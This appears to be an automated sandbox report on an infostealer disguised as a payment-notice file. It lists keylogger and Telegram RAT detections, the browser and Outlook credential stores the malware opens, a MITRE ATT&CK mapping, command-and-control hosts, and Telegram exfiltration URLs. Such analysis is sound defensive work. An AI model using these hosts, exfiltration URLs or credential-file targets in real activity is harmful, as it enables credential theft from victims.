Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Queries volume information: C:\Users\user\AppData\Roaming\SOFcFE.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Queries volume information: C:\Users\user\AppData\Roaming\SOFcFE.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 7220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 7220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 7220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
GeriOdemeBildirimi942.rar.xlxs.pdf.exe	28%	Virustotal		Browse
GeriOdemeBildirimi942.rar.xlxs.pdf.exe	50%	ReversingLabs	Win32.Infostealer.Generic
GeriOdemeBildirimi942.rar.xlxs.pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\SOFcFE.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\SOFcFE.exe	50%	ReversingLabs	Win32.Infostealer.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
awaratrendz.com	0%	Virustotal	Browse
reallyfreegeoip.org	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?L	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
awaratrendz.com	119.18.54.39	true	true	0%, Virustotal, Browse	unknown
reallyfreegeoip.org	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
checkip.dyndns.com	193.122.130.0	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2015:39:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2021:14:30%0D%0ACountry%20Name:%20%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	SOFcFE.exe, 00000014.00000002.3763196888.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F45000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.office.com/lB	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20a	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	SOFcFE.exe, 00000014.00000002.3763196888.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F14000.00000004.00000800.00020000.00000000.sdmp	false		unknown
